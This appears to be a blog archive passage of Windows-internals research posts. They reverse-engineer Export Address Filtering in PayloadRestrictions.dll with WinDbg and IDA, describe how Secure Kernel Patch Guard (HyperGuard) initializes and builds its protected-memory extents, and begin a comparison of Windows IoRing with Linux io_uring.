Base Address:           00007ffe`3d8b9000
End Address:            00007ffe`3da7a000
Region Size:            00000000`001c1000 (   1.754 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000002          PAGE_READONLY
Type:                   01000000          MEM_IMAGE
Allocation Base:        00007ffe`3d730000
Allocation Protect:     00000080          PAGE_EXECUTE_WRITECOPY
Image Path:             C:\WINDOWS\System32\kernelbase.dll
Module Name:            kernelbase
Loaded Image Name:
Mapped Image Name:
More info:              lmv m kernelbase
More info:              !lmi kernelbase
More info:              ln 0x7ffe3da6416c
More info:              !dh 0x7ffe3d730000
 
 
Content source: 1 (target), length: 15e94

Now we know that this address is in a read-only page inside KernelBase.dll. But we don’t have any information that will help us understand what this page is and why it’s guarded. Let’s follow the suggestion of the command output and run !dh to dump the headers of KernelBase.dll to get some more information (showing partial output here since full output is very long):

!dh 0x7ffe3d730000

File Type: DLL
FILE HEADER VALUES
8664 machine (X64)
7 number of sections
FE317FB0 time date stamp Sat Feb 21 05:53:36 2105

0 file pointer to symbol table
0 number of symbols
F0 size of optional header
2022 characteristics
Executable
App can handle >2gb addresses
DLL

OPTIONAL HEADER VALUES
20B magic #
14.30 linker version
188000 size of code
211000 size of initialized data
0 size of uninitialized data
89FE0 address of entry point
1000 base of code
----- new -----
00007ffe3d730000 image base
1000 section alignment
1000 file alignment
3 subsystem (Windows CUI)
10.00 operating system version
10.00 image version
10.00 subsystem version
39A000 size of image
1000 size of headers
3A8E61 checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
4160 DLL characteristics
High entropy VA supported
Dynamic base
NX compatible
Guard
334150 [ F884] address [size] of Export Directory
3439D4 [ 50] address [size] of Import Directory
369000 [ 548] address [size] of Resource Directory
34F000 [ 18828] address [size] of Exception Directory
397000 [ 92D0] address [size] of Security Directory
36A000 [ 2F568] address [size] of Base Relocation Directory
29B8C4 [ 70] address [size] of Debug Directory
0 [ 0] address [size] of Description Directory
0 [ 0] address [size] of Special Directory
255C20 [ 28] address [size] of Thread Storage Directory
1FB6D0 [ 140] address [size] of Load Configuration Directory
0 [ 0] address [size] of Bound Import Directory
2569D8 [ 16E0] address [size] of Import Address Table Directory
331280 [ 620] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory

Our faulting address is 0x7ffe3da6416c, which is at offset 0x33416c inside KernelBase.dll. Looking for the closest match in the output of !dh we can find the export directory at offset 0x334150:

334150 [    F884] address [size] of Export Directory

So the faulting code is trying to access an entry in the KernelBase export table. That shouldn’t happen under normal circumstances – if you debug another process (one that doesn’t have EAF enabled) you will not see any exceptions being thrown when accessing the export table. So we can guess that PayloadRestrictions.dll is causing this, and we’ll soon see how and why it does it.

One thing to note about guard page violations is this, quoted from this MSDN page:

If a program attempts to access an address within a guard page, the system raises a STATUS_GUARD_PAGE_VIOLATION (0x80000001) exception. The system also clears the PAGE_GUARD modifier, removing the memory page’s guard page status. The system will not stop the next attempt to access the memory page with a STATUS_GUARD_PAGE_VIOLATION exception.

So this guard page violation should only happen once and then get removed and never happen again. However, if we continue the execution of calc.exe, we’ll soon see another page guard violation on the same address:

This means the guard page somehow came back and is set on the KernelBase export table again.

The best guess in this case would probably be that someone registered an exception handler which gets called every time a guard page violation happens and immediately sets the PAGE_GUARD flag again, so that the same exception happens next time anything accesses the export table. Unfortunately, there is no good way to view registered exception handlers in WinDbg (unless setting the “enable exception logging” in gflags, which enables the !exrlog extension but I won’t be doing that now). However, we know that the DLL registering the suspected exception handler is most likely PayloadRestrictions.dll, so we’ll open it in IDA and take a look.

When looking for calls to RtlAddVectoredExceptionHandler, the function used to register exception handlers, we only see two results:

Both register the same exception handler — MitLibExceptionHandler:

(on a side note – I don’t often choose to use the IDA disassembler instead of the Hex Rays decompiler but PayloadRestrictions.dll uses some things that the decompiler doesn’t handler too well so I’ll be switching between the disassembler and decompiler code in this post)

We can set a breakpoint on this exception handler and see that it gets called from the same address that threw the page guard violation exception earlier (ntdll!LdrpSnapModule+0x23b):

Looking at the exception handler itself we can see it’s quite simple:

It only handles two exception codes:

  1. STATUS_GUARD_PAGE_VIOLATION
  2. STATUS_SINGLE_STEP

When a guard page violation happens, we can see MitLibValidateAccessToProtectedPage get called. Looking at this function, we can tell that a lot of it is dedicated to checks related to Import Address Filtering. We can guess that based on the address comparisons to the global IatShadowPtr variable and calls to various IAF functions:

Some of the code here is relevant for EAF, but for simplicity we’ll skip most of it (for now). Just by quickly scanning through this function and all the ones called by it, it doesn’t look like anything here is resetting the PAGE_GUARD modifier on the export table page.

What might give us a hint is to go back to WinDbg and continue program execution:

We’re immediately hitting another exception at the next instruction, this time its one of type single step exception. A single step exception is one normally triggered by debuggers when requesting a single step, such as when walking a function instruction by instruction. But in this case I asked the debugger to continue the execution, not do a single step, so it wasn’t WinDbg that triggered this exception.

The way a single step instruction is triggered is by setting the Trap Flag (bit 8) in the EFLAGS register inside the context record. And if we look towards the end of MitLibValidateAccessToProtectedPage we can see it doing exactly that:

So far we’ve seen PayloadRestrictions.dll do the following:

  1. Set the PAGE_GUARD modifier on the export table page.
  2. When the export table page is accessed, catch the exception with MitLibExceptionHandler and call MitLibValidateAccessToProtectedPage if this is a guard page violation.
  3. Set the Trap Flag in EFLAGS to generate a single step exception on the next instruction once execution resumes.

This matches the fact that MitLibExceptionHandler handles exactly two exception codes – guard page violations and single steps. So on the next instruction we receive the now expected single step exception and go right into MitLibHandleSingleStepException:

This is obviously a cleaned-up version of the original output. I saved you some of the work of checking what the global variables are and renaming them since this isn’t an especially interesting step – for example to check what function is pointed to by the variable I named pNtProtectVirtualMemory I simply dumped the pointer in WinDbg and saw it pointing to NtProtectVirtualMemory.

Back to the point – there are some things in this function that we’ll ignore for now and come back to later. What we can focus on is the call to NtProtectVirtualMemory, which (at least through one code path) sets the protection to PAGE_GUARD and PAGE_READONLY. Even without fully understanding everything we can make an educated guess and say that this is most likely the place where the KernelBase.dll export table guard page flag gets reset.

Now that we know the mechanism behind the two exceptions we’re seeing, we can go back to MitLibValidateAccessToProtectedPage to go over all the parts we skipped earlier and see what happens when a guard page violation occurs. First thing we see is a check to see if the faulting address in inside the IatShadow page. We can keep ignoring this one since it’s related to another feature (IAF) that we haven’t enabled for this process. We move on to the next section, which I titled FaultingAddressIsNotInShadowIat:

I already renamed some of the variables used here for convenience, but we’ll go over how I reached those names and titles and what this whole section does. First, we see the DLL using three global variables – g_MitLibState, a large global structure that contains all sorts of data used by PayloadRestrictions.dll, and two unnamed variables that I chose to call NumberOfModules and NumberOfProtectedRegions – we’ll soon see why I chose those names.

At a first glance, we can tell that this code is running in a loop. In each iteration it accesses some structure in g_MitLibState+0x50+index. This means there is some array at g_MitLibState+0x50, where each entry is some unknown structure. From this code, we can tell that each structure in the array in sized 0x28 bytes. Now we can either try to statically search for the function in the DLL that initializes this array and try to figure out what the structure contains, or we can go back to WinDbg and dump the already-initialized array in memory:

When dumping unknown memory it’s useful to use the dps command to check if there are any known symbols in the data. Looking at the array in memory we can see there are 3 entries. Using the we see that the first field in each of the structures is the base address of one module: Ntdll, KernelBase and Kernel32. Immediately following it there is a ULONG. Based on the context and the alignment we can guess that this might be the size of the DLL. A quick WinDbg query shows that this is correct:

0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("ntdll.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("ntdll.dll")).Select(m => m.Size)                
    [0x19]           : 0x211000
0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("kernelbase.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("kernelbase.dll")).Select(m => m.Size)                
    [0x7]            : 0x39a000
0:007> dx @$curprocess.Modules.Where(m => m.Name.Contains("kernel32.dll")).Select(m => m.Size)
@$curprocess.Modules.Where(m => m.Name.Contains("kernel32.dll")).Select(m => m.Size)                
    [0xc]            : 0xc2000

Next we have a pointer to the base name of the module:

0:007> dx -r0 (wchar_t*)0x00007ffe1a4926b0
(wchar_t*)0x00007ffe1a4926b0                 : 0x7ffe1a4926b0 : "ntdll.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a7d68
(wchar_t*)0x00000218f42a7d68                 : 0x218f42a7d68 : "kernelbase.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a80c8
(wchar_t*)0x00000218f42a80c8                 : 0x218f42a80c8 : "kernel32.dll" [Type: wchar_t *]

And another pointer to the full path of the module:

0:007> dx -r0 (wchar_t*)0x00000218f42a7970
(wchar_t*)0x00000218f42a7970                 : 0x218f42a7970 : "C:\WINDOWS\SYSTEM32\ntdll.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a7d40
(wchar_t*)0x00000218f42a7d40                 : 0x218f42a7d40 : "C:\WINDOWS\System32\kernelbase.dll" [Type: wchar_t *]
0:007> dx -r0 (wchar_t*)0x00000218f42a80a0
(wchar_t*)0x00000218f42a80a0                 : 0x218f42a80a0 : "C:\WINDOWS\System32\kernel32.dll" [Type: wchar_t *]

Finally we have a ULONG that is used in this function to indicate whether or not to check this range, so I named it CheckRipInModuleRange. When put together, we can build the following structure:

typedef struct _MODULE_INFORMATION {
    PVOID ImageBase;
    ULONG ImageSize;
    PUCHAR ImageName;
    PUCHAR FulleImagePath;
    ULONG CheckRipInModuleRange;
} MODULE_INFORMATION, *PMODULE_INFORMATION;

We could define this structure in IDA and get a much nicer view of the code but I’m trying to keep this post focused on analyzing this feature so I just annotated the idb with the field names.

Now that we know what this array contains we can have a better idea of what this code does – It iterates over the structures in this array and checks if the instruction pointer that accessed the guarded page is inside one of those modules. When the loop is done – or the code found that the faulting RIP is in one of those modules – it sets r8 to the index of the module (or leaves it as -1 if a module is not found) and moves on to the next checks:

Here we have another loop, this time iterating over an array in g_MitLibState+0x5D0, where each structure is sized 0x18, and comparing it to the address that triggered the exception (in our case, the address inside the KernelBase export table). Now we already know what to do so we’ll go and dump that array in memory:

We have here three entries, each containing what looks like a start address, end address and some flag. Let’s see what each of these ranges are:

  1. First range starts at the base address of NTDLL and spans 0x160 bytes, so pretty much covers the NTDLL headers.
  2. Second range is one we’ve been looking at since the beginning of the post – this is the KernelBase.dll export table.
  3. Third range is the Kernel32.dll export table (I won’t show how we can find this out because we’ve done this for KernelBase earlier in the post).

It’s safe to assume these are the memory regions that PayloadRestrictions.dll protects and that this check is meant to check that this guard page violation was triggered for one of its protected ranges and not some other guarded page in the process.

I won’t go into as many details for the other checks in this function because that would mostly involve repeating the same steps over and over and this post is pretty long as it is. Instead we’ll look a bit further ahead at this part of the function:

This code path is called if the instruction pointer is found in one of the registered modules. Even without looking inside any of the functions that are called here we can guess that MitLibMemReaderGadgetCheck looks at the instruction that accessed the guarded page and compares them to the expected instructions, and MitLibReportAddressFilterViolation is called to report unexpected behavior if the instructions is considered “bad”.

A different path is taken if the saved RIP is not in one of the known modules, which involved two final checks. The first checks if the saved RSP is inside the stack, and if it isn’t MitLibReportAddressFilterViolation is called to report potential exploitation:

The second calls RtlPcToFileHeader to get the base address of the module that the saved RIP is in and reports a violation if one is not found since that means the guarded page was accessed from within dynamic code and not an image:

All cases where MitLibReportAddressFilterViolation is called will eventually lead to a call to MitLibTriggerFailFast:

This ends up terminating the process, therefore blocking the potential exploit. If no violation is found, the function enables a single step exception for the next instruction that’ll run and the whole cycle begins again.

Of course we can keep digging into the DLL to learn about the initialization of this feature, the gadgets being searched for or what happens when a violation is reported, but I’ll leave those as assignments for someone else. For now we managed to get a good understanding of what EAF is and how it works that will allow us to further analyze it or search for potential bypasses, as well as getting some tools for analyzing similar mechanisms in PayloadRestrictions.dll or other security products.

HyperGuard – Secure Kernel Patch Guard: Part 2 – SKPG Extents

Welcome to Part 2 of the series about Secure Kernel Patch Guard, also known as HyperGuard. This part will start describing the data structure and components of SKPG, and more specifically the way it’s activated. If you missed Part 1, you can find it right here.

Inside HyperGuard Activation

In Part 1 of the series I introduced HyperGuard and described its different initialization paths. Whichever path we went through, we end up reaching SkpgConnect when the normal kernel finished its initialization. This is when all important data structures in the kernel have already been initialized and can start being monitored and protected by PatchGuard and HyperGuard.

After a couple of standard input validations, SkpgConenct acquires SkpgConnectionLock and checks the SkpgInitialized global variable to tell if HyperGuard has already been initialized. If the variable is set, the function will return STATUS_ACCESS_DENIED or STATUS_SUCCESS, depending on the information received. In either of those cases, it will do nothing else.

If SKPG has not been initialized yet, SkpgConnect will start initializing it. First it calculates and saves multiple random values to be used in several different checks later on. Then it allocates and initializes a context structure, saved in the global SkpgContext. Before we move on to other SKPG areas, it’s worth spending a bit of time talking about the SKPG context.

SKPG Context

This SKPG context structure is allocated and Initialized in SkpgConnect and will be used in all SKPG checks. It contains all the data needed for HyperGuard to monitor and protect the system, such as the NT PTE information, encryption algorithms, KCFG ranges, and more, as well as another timer and callback, separate to the ones we saw in the first part of the series. Unfortunately, like the rest of HyperGuard, this structure, which I’ll call SKPG_CONTEXT, is not documented and so we need to do our best to figure out what it contains and how it’s used.

First, the context needs to be allocated. This context has a dynamic size that depends on the data received from the normal kernel. Therefore, it is calculated at runtime using the function SkpgComputeContextSize. The minimal size of the structure is 0x378 bytes (this number tends to increase every few Windows builds as the context structure gains new fields) and to that will be added a dynamic size, based on the data sent from the normal kernel.

That input data, which is only sent when SKPG is initialized through the PatchGuard code paths, is an array of structures named Extents. These extents describe different memory regions, data structures and other system components to be protected by HyperGuard. I will cover all of these in more detail later in the post, but a few examples include the GDT and IDT, data sections in certain protected modules and MSRs with security implications.

After the required size is calculated, the SKPG_CONTEXT structure is allocated and some initial fields are set in SkpgAllocateContext. A couple of these fields include another secure timer and a related callback, whose functions are set to SkpgHyperguardTimerRoutine and SkpgHyperguardRuntime. It also sets fields related to PTE addresses and other paging-related properties, since a lot of the HyperGuard checks validate correct Virtual->Physical page translations.

Afterwards, SkpgInitializeContext is called to finish initializing the context using the extents provided by the normal kernel. This basically means iterating over the input array, using the data to initialize internal extent structures, that I’ll call SKPG_EXTENT, and sticking them at the end of the SKPG_CONTEXT structure, with a field I chose to call ExtentOffset pointing to the beginning of the extent array (notice that none of these structures are documented, so all structure and field names are made up):

SKPG Extents

There are many different types of extents, and each SKPG_EXTENT structure has a Type field indicating its type. Each extent also has a hash, used in some cases to validate that no changes were done to the monitored memory region. Then there are fields for the base address of the monitored memory and the number of bytes, and finally a union that contains data unique to each extent type. For reference, here is the reverse engineered SKPG_EXTENT structure:

typedef struct _SKPG_EXTENT
{
    USHORT Type;
    USHORT Flags;
    ULONG Size;
    PVOID Base;
    ULONG64 Hash;
    UCHAR TypeSpecificData[0x18];
} SKPG_EXTENT, *PSKPG_EXTENT;

I mentioned that the input extents used by HyperGuard were provided by the PatchGuard initializer function in the normal kernel. But SKPG initializes another kind of extents as well – secure extents. To initialize those, SkpgInitializeContext calls into SkpgCreateSecureKernelExtents, providing the SKPG_CONTEXT structure and the address where the current extent array ends – so the secure extents can be placed there. Secure extents use the same SKPG_EXTENT structure as regular extents and protect data in the secure kernel, such as modules loaded into the secure kernel and secure kernel memory ranges.

Extent Types

Like I mentioned, there are many different types of extents, each used by HyperGuard to protect a different part of the system. However, we can split them into a few groups that share similar traits and are handled in a similar way. For clarity and to separate normal extents from  secure extents, I will use the naming convention SkpgExtent for normal extent types and SkpgExtentSecure for secure extent types.

The first extent that I’d like to cover is a pretty simple one that always gets sent to SkpgInitializeContext regardless of other input:

Initialization Extent

There is one extent that doesn’t belong in any of the groups since it is not involved in any of the HyperGuard validations. This is extent 0x1000: SkpgExtentInit – this extent is not copied to the array in the context structure. Instead, this extent type is created by SkpgConnect and sent into SkpgInitializeContext to set some fields in the context structure itself that were previously unpopulated. These fields have additional hashes and information related to hotpatching, such as whether it is enabled and the addresses of the retpoline code pages. It also sets some flags in the context structure to reflect some configuration options in the machine.

Memory and Module Extents

This group includes the following extent types:

  • 0x1001: SkpgExtentMemory
  • 0x1002: SkpgExtentImagePage
  • 0x1009: SkpgExtentUnknownMemoryType
  • 0x100A: SkpgExtentOverlayMemory
  • 0x100D: SkpgExtentSecureMemory
  • 0x1014: SkpgExtentPartialMemory
  • 0x1016: SkpgExtentSecureModule

The thing all these extent types have in common is that they all indicate some memory range to be protected by HyperGuard. Most of these contain memory ranges in the normal kernel, however SkpgExtentSecureMemory and SkpgExtentSecureModule have VTL1 memory ranges and modules. Still, all these extent types are handled in a similar way regardless of the memory type or VTL so I grouped them together.

When normal memory extents are being added to the SKPG Context, all normal kernel address ranges get validated to ensure that the pages have a valid mapping for SKPG protection. For a normal kernel page to be valid for SKPG protection, the page can’t be writable. SKPG will monitor all requested pages for changes, so a writable page, whose contents can change at any time, is not a valid “candidate” for this kind of protection. Therefore, SKPG can only monitor pages whose protection is either “read” or “execute”. Obviously, only valid pages (as indicated by the Valid bit in the PTE) can be protected. There are slight differences to some of the memory extents when HVCI is enabled as SKPG can’t handle certain page types in those conditions.

Once mapped and verified, each memory page that should be protected gets hashed, and the hash gets saved into the SKPG_EXTENT structure where it will be used in future HyperGuard checks to validate that the page wasn’t modified.

Some memory extents describe a generic memory range, and some, like SkpgExtentImagePage, describe a specific memory type that needs to be treated slightly differently. This extent type mentions a specific image in the normal kernel, but HyperGuard should not be protecting the whole image, only a part of it. So the input extent has the image base, the page offset inside the image where the protection should start and the requested size. Here too the memory region to be protected will be hashed and the hash will be saved into the SKPG_EXTENT to be used in future validations.

But the SKPG_EXTENT structures that get written into the SKPG Context normally only describe a single memory page while the system might want to protect a much larger area in an image. It is simply easier for HyperGuard to handle memory validations one page at a time, to make for more predictable processing time and avoid taking up too much time while hashing large memory ranges, for example. So, when receiving an input extent where the requested size is larger than a page (0x1000 bytes), SkpgInitializeContext iterates over all the pages in the requested range and creates a new SKPG_EXTENT for each of them. Only the first extent, describing the first page in the range, receives the type SkpgExtentImage. All the other ones that describe the following pages receive a different type, 0x1014, which I chose to call SkpgExtentPartialMemory, and the original extent type is placed in the first 2 bytes in the type-specific data inside the SKPG_EXTENT structure.

Every extent in the array can be marked by different flags. One of these is the Protected flag, which can only be applied to normal kernel extents, meaning that the specified address range should be protected from changes by SKPG. In this case, SkpgInitializeContext will call SkmmPinNormalKernelAddressRange on the requested address range to pin in and prevent it from being freed by VTL0 code:

The secure memory extents essentially behave very similar to the normal memory extent, with the main differences being that they are initialized by the secure kernel itself and the details of what they are protecting.

Extents of type SkpgExtentSecureModule are generates to monitor all images loaded into the secure kernel space. This is done by iterating the SkLoadedModuleList global list, which, like the normal kernel’s PsLoadedModuleList, is a linked list of KLDR_DATA_TABLE_ENTRY structures representing all loaded modules. For each one of those modules, SkpgCreateSecureModuleExtents is called to generate the extents.

To do so, SkpgCreateSecureModuleExtents receives a KLDR_DATA_TABLE_ENTRY for one loaded DLL at a time, validates that it exists in PsInvertedFunctionTable (a table containing basic information for all loaded DLLs, mostly used for quick search for exception handlers) and then enumerates all the sections in the module. Most sections in a secure module are monitored using an SKPG_EXTENT but are not protected from modifications. Only one section is being protected, the TABLERO section:

The TABLERO section is a data section that exists in only a handful of binaries. In the normal kernel it exists in Win32k.sys, where it contains the win32k system service table. In the secure kernel a TABLERO section exists in securekernel.exe, where it contains global variables such as SkiSecureServiceTable, SkiSecureArgumentTable, SkpgContext, SkmiNtPteBase, and others:

When SkpgCreateSecureModuleExtents encounters a TABLERO section, it calls SkmmProtectKernelImageSubsection to change the PTE for the section pages from the default read-write to read only.

Then for each section, regardless of its type, an extent with type SkpgExtentSecureModule is created. Each memory region gets hashed a flag in the extent marks if the section is executable. The number of extents generated per section can vary: If HotPatching is enabled on the machine a separate extent will be generated for every page in the protected image ranges. Otherwise, every protected section generates one extent that might cover multiple pages, all of them with type SkpgExtentSecureModule:

If HotPatching is enabled, one last secure module extent gets created for each secure module. The variable SkmiHotPatchAddressReservePages will indicate how many pages are reserved for HotPatch use at the end of the module, and an extent gets created for each of those pages. Similar to the way described earlier for normal kernel module extents, each extent describes a single page, the extent type is SkpgExtentPartialMemory and the type SkpgExtentSecureModule is placed in one of the type-specific fields of the extent.

Another secure extent type is SkpgExtentSecureMemory. This is a generic extent type used to indicate any memory range in the secure kernel. However, for now it is only used to monitor the GDT pointed to by the secure kernel processor block – the SKPRCB. This is an internal structure that is similar in its purpose to the normal kernel’s KPRCB (and similarly, an array of them exists in SkeProcessorBlock). There will be one extent of this type for each processor in the system. Additionally, the function sets a bit in the Type field of each KGDTENTRY64 structure to indicate that this entry has been accessed and prevent it from being modified later on – but the entry for the TSS at offset 0x40 gets skipped:

This pretty much covers the initialization and uses of the memory extents. But this is just the first group of extents, and there are many others that monitor various different parts of the system. In the next post I’ll talk about more of these other extent types, which interact with system components like MSRs, control registers, the KCFG bitmap and more!

HyperGuard – Secure Kernel Patch Guard: Part 1 – SKPG Initialization

This will be a multi-part series of posts describing the internal mechanisms and purpose of Secure Kernel Patch Guard, also known as HyperGuard. This first part will focus on what SKPG is and how it’s being initialized.

Overview

In the world of Windows security, PatchGuard is a uniquely undocumented and hardly any “unofficial” documentation. Thus, there are conflicting opinions and rumors about the way it operates and different “PatchGuard bypasses” that get published aren’t very reliable. Still, every few years some helpful PG analysis gets published, shedding some light on this mysterious feature. This blog post is not about PatchGuard so we won’t go into much detail about it, but it discusses a similar and related feature, so some basic knowledge of PatchGuard is needed. Here are a couple of things needed to understand of the rest of the post:

  • The purpose of PatchGuard is to monitor the system for changes in kernel space that should not happen on a normal system and crash it when those are detected. This doesn’t mean any unusual data change – PatchGuard monitors a pre-determined list of data structures that are common targets for kernel exploitation or rootkits, such as modifications to HalDispatchTable or callback arrays, or changes to control registers or MSRs to disable security features. The full list of monitored structures and pointers is not documented and the information that does get published by Microsoft is left vague on purpose.
  • PatchGuard doesn’t monitor everything, all the time. It runs periodically, checking for certain changes every time it runs – it won’t necessarily crash the system right when a malicious change is done and a system might run for a long time with such changes. There is no guarantee that PatchGuard will ever detect and crash the system. This also means it is hard to validate potential bypasses.

The main weakness of PatchGuard and the reason for all the obscurity around its implementation is the fact that it monitors Ring 0 code and data – from code that runs in Ring 0. There is nothing preventing a rootkit that already gained Ring 0 code execution privileges from patching the code for PatchGuard itself and disabling or bypassing it. The only thing stopping this scenario is PatchGuard’s obscurity and the fact that its code is hard to find and uses a range of obfuscation techniques to make itself hard to analyze and disable.

There is a lot more to say about PatchGuard but, like I mentioned, this is not the topic of the post. So, I’ll skip right to discussing PatchGuard’s newer sibling – HyperGuard, also known as Secure Kernel Patch Guard, or SKPG. This new feature leverages the existence of Hyper-V and VBS to create a new monitoring and protection capability that is similar to PatchGuard but not susceptible to the same weaknesses since it is not running as normal Ring 0 code and cannot be tampered by normal rootkits.

Finding HyperGuard

HyperGuard takes advantage of VBS – Virtualization Based Security. This capability that was added in the past few years is made possible by the creation of Hyper-V and Virtual Trust Levels (VTLs). The hypervisor allows creating a system where most things run in VTL0, but some, more privileged things, run in higher VTLs (currently the only one implemented is VTL1) where they are not accessible to normal processes regardless of their privilege level – including VTL0 kernel code. Put simply, no VTL0 code can interact with memory in VTL1 in any way.

Having memory that cannot be tampered with even from normal kernel code allows for many new security features, some of which I’ve written about in the past and others are documented in other blogs, conference talks and official Microsoft documentation. A few examples include KCFG, HVCI and KDP.

This is also what allows Microsoft to implement HyperGuard – a feature similar to PatchGuard that can’t be tampered with even by malicious code that managed to elevate itself to run in the kernel. For this reason, HyperGuard doesn’t need to hide or obfuscate itself in any way, and it’s so much easier to analyze using static analysis tools.

The VTL1 kernel, also known as the secure kernel, is managed through SecureKernel.exe. This is also the binary where HyperGuard is implemented. If we open securekernel.exe in IDA we can easily find all the code implementing HyperGuard, which all uses the prefix Skpg:

This series will cover some of those functions, starting from the first ones being called during boot: SkpgInitSystem:

HyperGuard Initialization

HyperGuard initialization mostly happens during the normal kernel’s Phase 1 initialization, but requires multiple steps. The first step starts with a secure call where SKSERVICE=SECURESERVICE_PHASE3_INIT. This leads to SkInitSystem which will initialize SKCI (Secure Kernel Code Integrity) and call into SkpgInitSystem. This function sets up the basic components of SKPG – its callback, timer, extension table and intercept functions, all of which I’ll discuss in more detail later in this series. At this point SKPG is not fully initialized – that only happens later in response to another request from the normal kernel. For now, only a few SKPG globals are being set:

Some interesting components to notice at this stage are:

  • SkpgPatchGuardCallback – a callback which is going to be called every time HyperGuard checks need to run and will invoke the target function SkpgPatchGuardCallbackRoutine.
  • SkpgPatchGuardTimer – a secure kernel timer object that is going to control the execution of some HyperGuard checks. It gets set to run at a random time so checks will happen at different intervals, making periodic checks harder to avoid. The function set its callback function to SkpgPatchGuardTimerRoutine.
  • Intercept function pointers – other than the periodic checks controlled by the timer, HyperGuard also has a few intercept functions, which execute every time a certain operation is being intercepted by the Hypervisor. The operation being intercepted is pretty clear from the function names, but I’ll cover them in more detail later anyway. The global variables for these are:
    • ShvlpHandleMsrIntercept – points to SkpgxInterceptMsr
    • ShvlpHandleRegisterIntercept – points to SkpgxInterceptRegister
    • ShvlpHandleRepHypercallIntercept – points to SkpgInterceptRepHypercall
  • Optional variables – there are a few other global variables that did not fit in the screenshot and get initialized based on the flags received as part of the input argument, or other optional configuration:
    • SkpgInhibitKernelVaProtection
    • SkpgNtKvaShadow
    • SkpgSecureExtension

After initializing all the global variables, the function returns and the rest of the secure kernel initialization continues. For now, the timer is not scheduled and HyperGuard is effectively “dormant”. HyperGuard is only fully “activated” later – through a call to SkpgConnect.

There are three ways to call SkpgConnect and all start from a call by the normal kernel:

HyperGuard Activation

Connect Software Interrupt – the PatchGuard Path

The most interesting HyperGuard activation path is through PatchGuard. This SKPG activation path, like all others, begins with a secure call. This secure call, with SKSERVICE= SECURESERVICE_CONNECT_SW_INTERRUPT, originates from the normal kernel function VslConnectSwInterrupt. This leads, as usual, to the secure kernel handler which calls into IumpConnectSwInterrupt and from there to SkpgConnect, passing it all the data that was sent by the normal kernel.

When we search for calls to VslConnectSwInterrupt we see two calls – one from PsNotifyCoreDriversInitialized that I’ll cover soon and a second one from KiConnectSwInterrupt:

KiConnectSwInterrupt is only called by one caller – an anonymous function in ntoskrnl.exe that has no name in the public symbols. This is an extremely large function that calls into other anonymous functions and has a lot of weird and seemingly unrelated functionality. This is one of the PatchGuard initialization routines, which does the “real” activation of HyperGuard, supplying the secure kernel with memory protection ranges and targets which I will discuss later when talking about SKPG extents.

I encourage you to follow the call stack yourselves and get a bit of insight into the mysteries of PatchGuard initialization, but if I start covering PatchGuard details this series will quickly become a book so I will skip the details here. Let’s just trust me when I say that this all also happens in the context of Phase 1 initialization and is the first point where HyperGuard is activated.

Once HyperGuard is fully activated, a global variable SkpgInitialized is set to TRUE. This variable is checked every time SkpgConnect is called, and if set the function will return immediately and not make any changes to any SKPG initialization data. This means that the two other activation paths that will be described here will only activate HyperGuard if PatchGuard is not running and will result in less thorough protection of the machine. If PatchGuard is active, then the other two activation paths will return without doing anything.

Connect Software Interrupt – Phase1 Initialization

The second code path into VslConnectSwInterrupt goes through PsNotifyCoreDriversInitialized. This is also happening as part of Phase 1 initialization, but later than the PatchGuard path:

As we can see here, the call to VslConnectSwInterrupt is done with empty input variables, meaning no memory ranges or extra data is sent to HyperGuard and it will only use its basic functionality. If PatchGuard is running, then at this point SKPG should already be initialized and the call will return with no changes to SKPG, so this path is only needed if PatchGuard is not active.

Phase3 Initialization

The last case where HyperGuard is activated happens during Phase 3 initialization. This happens in response to a secure call with SKSERVICE=SECURESERVICE_REGISTER_SYSTEM_DLLS. It will also call into SkpgConnect with no input data, simply to initialize it if nothing else has already.

On the normal kernel side: In PspInitPhase3 the system checks the VslVsmEnabled global variable to learn whether Hyper-V is running and VSM is enabled. If it is, the system calls VslpEnterIumSecureMode – a common function to generate a secure call with a given service code and arguments packed into an MDL. The system enters secure mode with service code SECURESERVICE_REGISTER_SYSTEM_DLLS:

Once a secure call reaches the secure kernel it is handled by IumInvokeSecureService, which is pretty much just a big switch statement, calling the correct function or functions for each service code. In the case of code SECURESERVICE_REGISTER_SYSTEM_DLLS, it calls SkpgConnect and then uses the data passed in by the kernel to register system DLLs:

As I mentioned, this is the last time SkpgConnect is called, right at the end of system initialization. This is done in case SKPG hasn’t been initialized at an earlier stage already. In this case, SkpgConnect is called with almost no input data, to only initialize the most basic SKPG functionality. If SKPG has already been initialized earlier, this call will return without changing anything.

HyperGuard Activation – Diagram

This is it for part 1 of this series. So far, we only covered the general idea of what HyperGuard is and its initialization paths. Next time we will dive into SkpgConnect to see what happens during SKPG activation and learn more about the types of data SKPG protects and how.

IoRing vs. io_uring: a comparison of Windows and Linux implementations

A few months ago I wrote this post about the introduction of I/O Rings in Windows. After publishing it a few people asked for a comparison of the Windows I/O Ring and the Linux io_uring, so I decided to do just that. The short answer – the Windows implementation is almost identical to the Linux one, especially when using the wrapper function provided by helper libraries. The long answer is what I’ll be covering in the rest of this post.
The information about the io_uring implementation was gathered mostly from here – a paper documenting the internal implementation and usage of io_uring on Linux and explaining some of the reasons for its existence and the way it was built.
As I said, the basic implementation of both mechanisms is very similar – both are built around a submission queue and a completion queue that have shared views in both user and kernel address spaces. The application writes the requested operation data into the submission queue and submits it to the kernel, which processes the requested number of entries and writes the results into the completion queue. In both cases there is a maximum number of allowed entries per ring and the completion queue can have up to However, there are some differences in the internal structures as well as the way the application is expected to interact with the I/O ring.

Initialization and Memory Mapping

One such difference is the initialization stage and mapping of the queues into user space: on Windows the kernel fully initializes the new ring, including the creation of both queues and creating a shared view in the application’s user-mode address space, using an MDL. However, in the Linux io_uring implementation, the system creates the requested ring and the queues but does not map them into user space. The application is expected to call mmap(2) using the appropriate file descriptors to map both queues into its address space, as well as the SQE array, which is separate from the main queue.
